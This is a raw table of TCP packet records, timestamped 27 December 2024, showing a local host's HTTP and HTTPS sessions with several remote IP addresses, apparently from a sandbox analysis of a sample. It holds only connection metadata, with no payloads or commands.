Dec 27, 2024 07:09:19.301918030 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.301933050 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.301983118 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.303023100 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.303112984 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.303160906 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.304251909 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.304393053 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.304444075 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.305459976 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.305603981 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.305649996 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.306730032 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.306833982 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.306883097 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.307934999 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.308057070 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.308099985 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.309206009 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.309391975 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.309442997 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.310518980 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.310556889 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.310648918 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.311645031 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.311836958 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.311877966 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.312932968 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.312987089 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.313040018 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.314129114 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.314224005 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.314275026 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.315011978 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.315330029 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.315515041 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.315558910 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.316560984 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.316688061 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.316730976 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.317785978 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.317907095 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.317943096 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.319020987 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.319173098 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.319210052 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.320276976 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.320384979 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.320429087 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.321571112 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.321646929 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.321686029 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.322757006 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.322866917 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.322926998 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.323962927 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.324096918 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.324148893 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.325191021 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.325295925 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.325346947 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.326452017 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.326507092 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.326550961 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.327672005 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.327820063 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.327864885 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.328911066 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.329009056 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.329061985 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.330203056 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.330255985 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.330323935 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.331485033 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.331499100 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.331543922 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.332591057 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.332685947 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.332741022 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.333887100 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.333947897 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.333988905 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.335068941 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.335175991 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.335220098 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.336297035 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.336448908 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.336507082 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.337572098 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.337646008 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.337688923 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.338783026 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.338958979 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.339008093 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.340070009 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.340215921 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.340260029 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.341253996 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.341376066 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.341423988 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.342493057 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.342588902 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.342629910 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.343703032 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.343811989 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.343852997 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.344926119 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.345052004 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.345091105 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.346189022 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.346342087 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.346380949 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.347359896 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.395891905 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.493122101 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.493195057 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.493232965 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.493419886 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.493563890 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.493603945 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.494671106 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.494813919 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.494859934 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.495894909 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.496042013 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.496088028 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.497144938 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.497230053 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.497355938 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.498402119 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.498512983 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.498549938 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.499609947 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.499725103 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.499773026 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.500883102 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.500946045 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.500978947 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.502083063 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.502161026 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.502208948 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.503293037 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.503403902 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.503437996 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.504544973 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.504689932 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.504728079 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.505765915 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.505884886 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.505923033 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.507002115 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.507138968 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.507169008 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.508236885 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.508356094 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.508405924 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.509443045 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.509565115 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.509601116 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.510720968 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.510791063 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.510838985 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.511944056 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.512121916 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.512155056 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.513166904 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.513219118 CET	80	49704	5.252.155.64	192.168.2.5
Dec 27, 2024 07:09:19.513264894 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:19.619982004 CET	49704	80	192.168.2.5	5.252.155.64
Dec 27, 2024 07:09:39.456927061 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:39.456978083 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:39.457075119 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:39.466586113 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:39.466603994 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:40.879187107 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:40.879276037 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:40.926928043 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:40.926953077 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:40.927239895 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:40.927299976 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:40.928998947 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:40.971350908 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:41.886763096 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:41.886786938 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:41.886821032 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:41.886848927 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:41.886846066 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:41.886883974 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:41.886919975 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:41.888931036 CET	49752	443	192.168.2.5	149.154.167.99
Dec 27, 2024 07:09:41.888956070 CET	443	49752	149.154.167.99	192.168.2.5
Dec 27, 2024 07:09:42.369956970 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:42.369981050 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:42.370053053 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:42.370273113 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:42.370285034 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:44.303410053 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:44.303498983 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:44.306976080 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:44.306986094 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:44.307225943 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:44.307293892 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:44.307662010 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:44.355340004 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:45.011496067 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:45.011560917 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:45.011570930 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:45.011612892 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:45.014662981 CET	49758	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:45.014678955 CET	443	49758	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:45.016526937 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:45.016618967 CET	443	49766	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:45.016706944 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:45.016895056 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:45.016926050 CET	443	49766	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:46.558016062 CET	443	49766	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:46.558099031 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:46.561419964 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:46.561445951 CET	443	49766	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:46.563616991 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:46.563632011 CET	443	49766	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:47.465210915 CET	443	49766	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:47.465277910 CET	443	49766	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:47.465425014 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:47.465425014 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:47.465682983 CET	49766	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:47.465730906 CET	443	49766	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:47.467158079 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:47.467190027 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:47.467261076 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:47.467482090 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:47.467494965 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:48.864484072 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:48.864567041 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:48.865154028 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:48.865161896 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:48.868232965 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:48.868237972 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:49.751555920 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:49.751569986 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:49.751621962 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:49.751672983 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:49.751718044 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:49.751914978 CET	49771	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:49.751929998 CET	443	49771	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:49.753293991 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:49.753354073 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:49.753467083 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:49.753741980 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:49.753757954 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:51.198194981 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:51.198276997 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:51.198657990 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:51.198672056 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:51.200373888 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:51.200387001 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:52.088851929 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:52.088876963 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:52.088916063 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:52.088944912 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:52.088959932 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:52.088962078 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:52.088992119 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:52.089020014 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:52.089255095 CET	49777	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:52.089268923 CET	443	49777	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:52.090836048 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:52.090888977 CET	443	49783	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:52.091243029 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:52.091243029 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:52.091289043 CET	443	49783	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:53.539171934 CET	443	49783	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:53.539233923 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:53.539629936 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:53.539638042 CET	443	49783	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:53.541569948 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:53.541574955 CET	443	49783	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:54.485261917 CET	443	49783	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:54.485321999 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:54.485340118 CET	443	49783	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:54.485383034 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:54.539109945 CET	49783	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:54.539129019 CET	443	49783	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:54.561248064 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:54.561285019 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:54.561356068 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:54.564980984 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:54.564999104 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:55.562320948 CET	49791	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:55.562371016 CET	443	49791	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:55.562450886 CET	49791	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:55.562670946 CET	49791	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:55.562685966 CET	443	49791	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:56.134728909 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:56.136101007 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:56.136496067 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:56.136502981 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:56.138075113 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:56.138079882 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:56.138124943 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:56.138134956 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:57.018377066 CET	443	49791	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:57.018469095 CET	49791	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:57.144143105 CET	49791	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:57.144156933 CET	443	49791	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:57.146034956 CET	49791	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:57.146039963 CET	443	49791	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:57.255108118 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:57.255176067 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:57.255182981 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:57.255233049 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:57.256954908 CET	49789	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:57.256972075 CET	443	49789	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:58.142385960 CET	443	49791	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:58.142460108 CET	443	49791	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:58.142524958 CET	49791	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:58.211101055 CET	49791	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:09:58.211129904 CET	443	49791	188.245.216.205	192.168.2.5
Dec 27, 2024 07:09:58.469115973 CET	49800	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:58.469145060 CET	443	49800	172.217.21.36	192.168.2.5
Dec 27, 2024 07:09:58.469202995 CET	49800	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:58.469818115 CET	49800	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:58.469830990 CET	443	49800	172.217.21.36	192.168.2.5
Dec 27, 2024 07:09:58.972496986 CET	49806	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:58.972537994 CET	443	49806	172.217.21.36	192.168.2.5
Dec 27, 2024 07:09:58.972706079 CET	49806	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:58.972913027 CET	49806	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:58.972928047 CET	443	49806	172.217.21.36	192.168.2.5
Dec 27, 2024 07:09:59.029778957 CET	49807	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:59.029875994 CET	443	49807	172.217.21.36	192.168.2.5
Dec 27, 2024 07:09:59.029970884 CET	49807	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:59.030253887 CET	49807	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:59.030287981 CET	443	49807	172.217.21.36	192.168.2.5
Dec 27, 2024 07:09:59.114825964 CET	49809	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:59.114886999 CET	443	49809	172.217.21.36	192.168.2.5
Dec 27, 2024 07:09:59.114965916 CET	49809	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:59.115261078 CET	49809	443	192.168.2.5	172.217.21.36
Dec 27, 2024 07:09:59.115272999 CET	443	49809	172.217.21.36	192.168.2.5
Dec 27, 2024 07:10:00.351103067 CET	443	49800	172.217.21.36	192.168.2.5
Dec 27, 2024 07:10:00.351349115 CET	49800	443	192.168.2.5	172.217.21.36
